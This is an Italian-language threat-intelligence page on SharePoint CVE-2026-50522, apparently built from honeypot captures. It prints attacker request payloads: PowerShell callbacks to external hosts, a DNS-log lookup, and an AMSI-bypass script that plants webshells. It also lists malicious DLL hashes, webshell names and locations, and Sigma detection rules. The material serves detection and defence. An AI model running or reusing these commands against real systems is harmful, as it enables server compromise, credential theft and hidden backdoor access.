Torna agli aggiornamenti
UpdatedAug 4, 2026

CVE-2026-50522 — Updated!

Microsoft SharePoint CVE-2026-50522

Condividi

CVE-2026-50522

Payload e analisi di Microsoft SharePoint CVE-2026-50522.

Richieste HTTP

richiestasrcuser-agentcodificaID univocopayload
81697888245.63.58.216Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'urn:unique-id:securitycontext:b764f8e60e90450b8629b5ce74fccf82powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://45.63.58.216:80/b764f8e60e90450b8629b5ce74fccf82'
818198798146.19.216.119Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.26100.33158'urn:unique-id:securitycontext:2965f1ebb795466c82f01142ca764efaMain.dll
819557248Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"urn:unique-id:securitycontext:8e1a54521f004b19880a4823bcdd3a94ayhmu2nq.dll
819736316165.154.199.52Mozilla/5.0'urn:uid:f7e4a5a8041648ef88f4befd099b1c61eze1fcmh.dll
82202661089.117.94.35Python-urllib/3.12"urn:unique-id:securitycontext:77b2293ba0f5464db990f3d2ae402698ActivitySurrogateDisableTypeCheck
82202661689.117.94.35Python-urllib/3.12"urn:unique-id:securitycontext:401e5797f3864092a836f92976a6506fedm3ysnc.dll
822486322199.91.221.39Mozilla/5.0 (compatible; SPOOB/1.0)"urn:unique-id:securitycontext:0e5062c6139e48e3bd951e88b3165a48opctzxj4.dll
822730890199.91.221.39Mozilla/5.0 (compatible; SPMKScan/1.1)"urn:unique-id:securitycontext:64ca3f7733c04b8cbcd859e1c08ebb54ko5ybodq.dll
823155656175.137.255.204Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"urn:unique-id:securitycontext:6ae69a0ebb7c4b66b7e8cc6f232a7ce3powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://d9k41hj3d47lhf7hbhlg6enhdi7tqb3uk.oast.me/206.255.76.17'
823277752103.151.172.73Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"urn:unique-id:securitycontext:ed252fcd4481466d9f70d3a693a9d073nslookup 9ac2293c.log.dnslog.pp.ua
82345241438.175.103.78Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"urn:unique-id:securitycontext:50fe1b81594845f293362037b3b4b32d`powershell.exe -NoProfile -NonInteractive -Command $ErrorActionPreference='SilentlyContinue';$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');if($a){$f=$a.GetField('amsiInitFailed','NonPublic,Static');if($f){$f.SetValue($null,$true)}};$c=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('[SNIP ERROR.aspx webshell'));$dirs=@('C:\inetpub\wwwroot\wss\VirtualDirectories','C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS','C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS');foreach($d in $dirs){if(Test-Path $d){Get-ChildItem $d -Recurse -Directory -ErrorAction SilentlyContinue
824307296190.5.224.135Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"urn:unique-id:securitycontext:0584ba10642c43e2850bff4122a81514powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand JABFAHIAcgBv[SNIP], `$ErrorActionPreference='SilentlyContinue';$ProgressPreference='SilentlyContinue';$webshellB64='[SNIP default_settings.aspx webshell]';$msg='NOPATH';$done=$false;@('16','15')

Payload

nome filehash SHA-256 del filedata di creazione (UTC)note
14e2gtsh.dll8bd04f0213c39f07c4baa283375017463e20642545a6fefcbcb6d792c7ee6d9d2026-07-24 03:00:13Restituisce MachineKeys
ayhmu2nq.dlledb087336f22a152d9023416b60ee74db2d30e5df52f2166f5dd1b4ae70aa2eb2026-07-24 01:47:55Abilita WinRM con CompatibilityHttpsListener, aggiunge l'utente sp_admin e lo aggiunge al gruppo locale Administrators
b4tg4ktk.dll824052c860945c1bda536f20318429240319f4f59bc4cf8740a0d6bffe2b99662026-07-23 07:53:59Restituisce MachineKeys e il codice di stato 200
bwd0vdqa.dllafce3e097f06e1c5e4dd3422dd7ebc6615a94b111a8b7ab5333071fbb1ecbb352026-07-23 02:54:54Restituisce MachineKeys
edm3ysnc.dll91d18bcd4532c7f64a220ca65971e2a41d435148e4ac9811bfc33d2a8fb705492026-07-22 10:54:43Restituisce MachineKeys
eze1fcmh.dll02fe5d24867227cb4bff7d3f019d804a19158e3de1de0729fdd067aae55b0bbd2026-07-24 02:37:59Scrive webshell/backdoor cmRANDOM.aspx
hyyavam5.dll74c205b86a8c0884d968225e20db2624164021df14987bc7f602a9ed45ed6c8f2026-07-26 03:20:01
jflyahz3.dll352e47e996a1b43250a4462fa259e12b1fee726abe1be42f1806b30be94591512026-07-23 07:15:43Restituisce MachineKeys
ko5ybodq.dll249fea110682ff603bf24f9c1147eae73642b186c7a23022d5f824498b8fcd662026-07-27 14:41:06
Main.dll7baf220eb89f2a216fcb2d0e9aa021b2a10324f0641caf8b7a9088e4e45bec952055-02-11 11:16:12Restituisce MachineKeys. Payload già utilizzato in precedenza durante la campagna ToolShell.
obdw11tn.dll2ed05c2ff5977047a5aa779510983f7f27b1fde8a0ce6ac8611341eea55f9e372025-07-29 08:50:39Restituisce MachineKeys
opctzxj4.dllf5c8c39b29d061d72eaefcf1ff19511bdab5d4b3c9849df4ead07dbe61364ee22026-07-27 15:32:46
tyt0qmyy.dll46e5aedd0e699bf0a3ad8f8cd67d79b51d65ce77e02ff96a49617d5c8c3fe4d72026-07-20 08:55:23Restituisce l'header di risposta HTTP sec-ch-ua-mobile: ?1
z1zkfu55.dllab2e01650b20787dd940475041f83f19c4e025988fcf8aab443ca607003da0122026-07-26 04:49:55
gzlzbkhj.dll52f4af0401258daa9a278710145a9d0d67a35147f0ea136b88684362953489332026-07-25 14:08:17
qho14tqo.dll814db355b4a03fbd6fa138b37a04dd5ff24d9bc5d15e24474f149b220e9c60782026-07-23 06:58:36

Webshell

nome filehash SHA-256note
cmRANDOM.aspx450839ecab9cb5595b4f6088e7b16d7ea3a5289f2afcc7ae89c041ae046e2511Webshell "Helper Tool" e nome file cm{RANDOM}.aspx. I payload vengono eseguiti in memoria tramite Assembly.Load(assemblyBytes). Il nome file viene randomizzato.
default_settings.aspxf72a4d95b4c49bb9ffac869d2a30d829f2519d2f6a1a86bcea54dbeffc34f550Posizione della webshell: TEMPLATE\LAYOUTS o \wss\VirtualDirectories\
error.aspx291dc1f15143c2c87fd2257b6145069914bdffa2f6be9afa63169f8661d9cc4bPosizione della webshell: C:\inetpub\wwwroot\wss\VirtualDirectories, C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS, C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS.
layout2sp.aspxd7ba3ef04a5809d6c672a13bbd7d6a3fc6317faeefbae98bec437ade0475a597Posizione della webshell: \TEMPLATE\LAYOUTS\layout2sp.aspx.

Rilevamenti

I rilevamenti non sono stati verificati con log reali.

tiporegolanote
SigmaQuery DNS verso domini di interazione con servizi esterniRileva query DNS in uscita verso i domini di callback come .log.dnslog.pp.ua, .oast.me, .oastify.com.
SigmaNuovo utente creato tramite Net.EXERileva nuovi utenti aggiunti tramite net.exe.
SigmaPotenziale movimento laterale WMI: WmiPrvSE avvia PowerShellRileva movimento laterale tramite WMI.
SigmaScrittura di file sospetta nella directory Layouts di SharePointRileva scritture di file nella cartella SharePoint \TEMPLATE\LAYOUTS\.
SigmaProcesso padre PowerShell sospettoRileva l'avvio di powershell.exe da parte di w3wp.exe.
SigmaProcesso sospetto avviato dal processo del server webRileva processi sospetti avviati da w3wp.exe.
SigmaProcessi sospetti avviati da WinRMRileva processi sospetti, inclusi i processi shell avviati dal processo host WinRM.
SigmaRilevamento di webshell tramite parole chiave nella riga di comandoRileva alcuni parametri della riga di comando spesso usati durante l'attività di ricognizione tramite webshell.
SigmaPattern di attività di hacking tramite webshellRileva alcuni processi figlio di w3wp.exe

Categorie